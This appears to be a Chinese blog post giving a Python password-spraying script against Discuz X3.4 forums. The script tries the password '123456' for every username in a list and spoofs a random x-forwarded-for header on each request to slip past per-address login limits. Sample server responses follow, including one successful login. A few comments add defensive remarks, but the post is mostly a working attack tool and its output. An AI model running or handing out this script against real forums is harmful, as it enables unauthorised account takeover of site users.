2020-11-02 | Python | UNLOCK

Discuz 无验证码爆破用户

Discuz X3.4

Fuzz.py

import random
import requests

def rrrr():
    """Build the dotted string that the script sends as ``x-forwarded-for``.

    Three random decimal digits are drawn once and that three-character
    group is repeated in all four positions, so the result is not
    guaranteed to be a valid IPv4 address. In access logs it appears as a
    client-supplied forwarded address whose four groups are identical,
    which makes this traffic straightforward to flag.
    """
    digits = "1234567890"
    group = "".join(random.choice(digits) for _ in range(3))
    return ".".join([group] * 4)
def headers():
    """Return the header set attached to every login POST.

    The ``x-forwarded-for`` value comes from a fresh ``rrrr()`` call, so
    each request claims a different origin address -- presumably to make
    attempt limits keyed on that header see a new client every time.
    A server should honour this header only when it is set by a trusted
    reverse proxy, and should count failed logins per account as well as
    per address.
    """
    forwarded_for = rrrr()
    return {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "x-forwarded-for": forwarded_for,
    }

# One fixed password is submitted for every username listed in user.txt.
# The form hash, login hash and referer are hard-coded values captured from
# one session; each request gets a newly generated x-forwarded-for header.
# NOTE(review): the original paste lost its indentation; the response
# handling is placed inside the loop because the sample output on the page
# contains one response per request.
login_url = "http://target/member.php?mod=logging&action=login&loginsubmit=yes&handlekey=login&loginhash=La6y6&inajax=1"
body_template = "formhash=f41af98&referer=http%3A%2F%2Ftarget.com%2Fhome.php%3Fmod%3Dspacecp%26ac%3Davatar&loginfield=username&username={}&password={}&questionid=0&answer="

usernames = open("user.txt",'r',encoding='utf-8').readlines()
for raw_line in usernames:
    username = raw_line.strip()
    body = body_template.format(username, "123456")
    # The utf-8 -> latin1 round trip keeps the UTF-8 bytes of non-ASCII
    # usernames intact when requests encodes the str body for the wire.
    response = requests.post(
        login_url,
        data=body.encode("utf-8").decode("latin1"),
        headers=headers(),
        timeout=None,
    )
    print(response.text)
    # Every raw response is appended to result.txt. The sample output on the
    # page shows that the server's lockout and remaining-attempts messages
    # are still returned for some requests.
    with open("result.txt",'a+',encoding='utf-8') as out:
        out.write(response.text)

result

<root><![CDATA[密码错误次数过多,请 15 分钟后重新登录<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('密码错误次数过多,请 15 分钟后重新登录', {});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[<script type="text/javascript" reload="1">if(typeof succeedhandle_login=='function') {succeedhandle_login('home.php?mod=spacecp&ac=profile&op=password', '您的账户存在安全隐患,建议立即修改密码', {'username':'tvftdrljw','usergroup':'<font color=\"#000000\">一钻用户</font>','uid':'2','groupid':'10','syn':'1'});}hideWindow('login');showDialog('您的账户存在安全隐患,建议立即修改密码', 'notice', null, function () { window.location.href ='home.php?mod=spacecp&ac=profile&op=password'; }, 0, null, null, null, null, null, 2);</script><script type="text/javascript" src="localhost/api/uc.php?time=1603975193&code=09e9Gvf4YnUq9FDf%2BVhi0lGMsP280jvpMMJ4cxqDhHVdk5iO8u2BPTZ6QSzXP1%2Bd8KKm51mhYQ7sGGWXn3Pgv%2B%2BpHaEd1CRIuZgDC%2FdQQQMJlSmYRQ0xfdIzY8ifnBeBEs%2FGdAuDtI26Dq3iD7py2Pfy5qFYH7FQ2cAVS00KRg" reload="1"></script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[登录失败,您还可以尝试 3 次<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('登录失败,您还可以尝试 3 次', {'loginperm':'3'});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[密码错误次数过多,请 15 分钟后重新登录<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('密码错误次数过多,请 15 分钟后重新登录', {});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[登录失败,您还可以尝试 4 次<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('登录失败,您还可以尝试 4 次', {'loginperm':'4'});}</script>]]></root><?xml version="1.0" encoding="gbk"?>

<root><![CDATA[登录失败,您还可以尝试 4 次<script type="text/javascript" reload="1">if(typeof errorhandle_login=='function') {errorhandle_login('登录失败,您还可以尝试 4 次', {'loginperm':'4'});}</script>]]></root><?xml version="1.0" encoding="gbk"?>
